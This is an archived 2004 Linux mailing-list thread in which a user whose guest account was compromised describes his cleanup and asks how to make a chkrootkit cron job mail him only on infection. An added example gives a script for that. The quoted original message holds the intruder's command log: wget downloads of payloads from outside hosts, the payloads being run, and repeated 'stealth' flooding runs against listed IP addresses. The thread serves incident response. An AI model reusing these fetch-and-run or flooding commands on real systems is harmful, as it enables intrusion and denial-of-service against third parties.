Re: [SLUG] Someone in my computer

From: Tevfik Yucek (yucek@eng.usf.edu)
Date: Wed Aug 25 2004 - 18:02:40 EDT


I would like to thank everybody that has sent their very helpful
comments.

Yes, I was stupid enough to have an account "guest" (sorry, it was
not "user", it was "guest") with password "guest". In Turkish, we
have a saying: "bir musibet bin nasihattan iyidir", which means one
bad experience is more effective (or better) than a thousand pieces of advice.
Now I have learned my lesson and will be *more* careful.

Here are the things that I did:

- removed the guest login (deleted the entry in /etc/passwd)
- changed my root password
- removed the .src directory in tmp
- ran chkrootkit

Unfortunately, I got the following in chkrootkit:
        checking `bindshell'... INFECTED (PORTS: 3049)
which says I am rootkited.

I will re-install my computer this weekend :(.

I have a question: I want to run chkrootkit everyday. I put the
following line in my cron file:

cd /path/to/chkrootkit; ./chkrootkit 2>&1 | mail -s "chkrootkit output" myemail

it works fine; however, I don't want to get e-mails every day. I want
to send the email only if the output of chkrootkit has the word
"INFECTED" in it. Can someone help me with this?

Thanks again for the great help.

Tevfik
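One way to get the "mail only on INFECTED" behaviour asked for above, as an added example that is not part of the original post: a small POSIX sh wrapper that saves the full chkrootkit report, and only mails it when a line is flagged. The chkrootkit directory, recipient address and report path are placeholders; `mail` and `hostname` are assumed to be available to cron, and the grep also matches chkrootkit's "Warning:" lines, which it prints for things like possible LKM trojans.

```shell
#!/bin/sh
# chkrootkit-cron.sh (added example): run chkrootkit from cron and mail
# the report only when it contains findings.
# Cron entry, e.g. daily at 04:00:
#   0 4 * * * /usr/local/sbin/chkrootkit-cron.sh run
# Cron runs with a minimal PATH, so make sure /sbin and /usr/sbin are on it.
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export PATH

CHKROOTKIT_DIR="${CHKROOTKIT_DIR:-/path/to/chkrootkit}"  # placeholder path
RECIPIENT="${RECIPIENT:-myemail}"                         # placeholder address
REPORT="${REPORT:-/var/log/chkrootkit.last}"              # placeholder path

# Print the flagged lines of a saved report; exit status 0 if there are any.
# chkrootkit writes "INFECTED" (uppercase) for hits and "Warning:" for
# suspicious findings; "not infected" is lowercase and so does not match.
flagged_lines() {
    grep -E 'INFECTED|Warning' "$1"
}

# Run the scan, keep the full report on disk, mail only when something is flagged.
run_and_report() {
    cd "$CHKROOTKIT_DIR" || exit 1
    ./chkrootkit > "$REPORT" 2>&1
    if flagged_lines "$REPORT" > /dev/null; then
        {
            echo "chkrootkit flagged the following on $(hostname):"
            flagged_lines "$REPORT"
            echo
            echo "Full report:"
            cat "$REPORT"
        } | mail -s "chkrootkit: INFECTED on $(hostname)" "$RECIPIENT"
    fi
}

# Only scan when invoked with "run", so the file can be sourced for testing.
case "${1:-}" in
    run) run_and_report ;;
esac
```

Keep the previous report around (for example by copying it to a dated file before each run) so a new finding can be compared against the last clean scan; and note that a chkrootkit run on an already rootkitted host can itself be lied to, which is why the reinstall is the right call.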

On Tue, Aug 24, 2004 at 09:51:49AM -0400, Tevfik Yucek wrote:
>
> Hi all,
>
>
> Last night I realized there was someone in my computer, Slackware 10.
> I have an sshd running and he/she/it connected to my computer and
> executed the following commands.
>
> I am usually not concerned with security and did not care much
> until yesterday. I had a guest "user" account with password "guest"
> and he/she/it used it.
>
> So, here are my questions:
> - how did he/she/it know about my IP, how did they know I was
> using Linux, and how did he/she/it get the password? Just guessing?
> - how can I kick a user off if I notice that I have an uninvited
> visitor? I had to stop the internet connection of my computer.
> - what do the commands below do and should I do something about
> them?
>
>
> Thanks,
> Tevfik
>
> Here are the commands:
>
> passwd
> cat /etc/issue
> cd /tmp
> mdkri .src
> cd .src
> mkdir .src
> cd .src
> wget carmelo.go.ro/do.tgz
> tar zxvf do.tgz
> rm -rf do.tgz
> ./do
> ./do
> wget 0kas.com/prt.tgz
> tar zxvf prt.tgz
> ./x
> ./x
> ./x
> ./x
> ./x
> ./x
> wget stefang.com/prostii/n
> chmod +x n
> ./n
> ./n
> ./n
> ./n
> ./n
> ./n
> ./n
> ./n
> ./n
> ./n
> ls
> ./n
> ./x
> ./x
> ./x
> wget yahaa.at/p/90
> ./90
> chmod +x 90
> ./90
> ./90
> wget 0kas.com/Florin/flood.tar.gz
> tar zxvf flood.tar.gz
> rm -rf flood.tar.gz
> ls
> rm -rf prt.tgz
> ls
> rm -rf prt.tgz
> cd belea
> ./stealth 218.38.3.83 53
> cd /tmp/.src/belea
> ./stealth 80.97.245.241 53
>
>
> ./stealth
> ^[[A
>
> w
> cd /tmp/.src
> cd belea
> ./steath 82.208.160.155 53
> ./steath 82.208.160.155 53
> ./steath 82.208.160.155 53
> ./stealth 82.208.160.155 53
> ./stealth 82.208.160.155 53
> export PATH="."
> bash
> cd /tmp/.src/belea
> w
> w
> cat psybnc.conf
> locate psybnc.conf
> ./stealth 213.154.149.199 53
> w
> ./stealth 213.233.97.53 53
> ./stealth 194.105.27.21 80
> ./stealth 81.196.147.218 53
> ./stealth 81.196.59.83 80
> ./stealth 81.196.59.83 53
> cd /tmp/.src
> cd belea
> ./stealth 80.96.146.171 53
> cd /tmp/ .scr/belea
> ./stealth 81.196.147.170 53
> ./stealth 81.196.147.170 55
> ./stealth 81.196.147.170 53
> ./stealth 211.47.141.43 53
> cd .src
> ce belea
> cd belea
> ./stealth 211.47.141.43
> ./stealth 211.47.141.43 53
> ./stealth 211.47.141.43 53
> w
> -----------------------------------------------------------------------
> This list is provided as an unmoderated internet service by Networked
> Knowledge Systems (NKS). Views and opinions expressed in messages
> posted are those of the author and do not necessarily reflect the
> official policy or position of NKS or any of its employees.



This archive was generated by hypermail 2.1.3 : Fri Aug 01 2014 - 15:24:19 EDT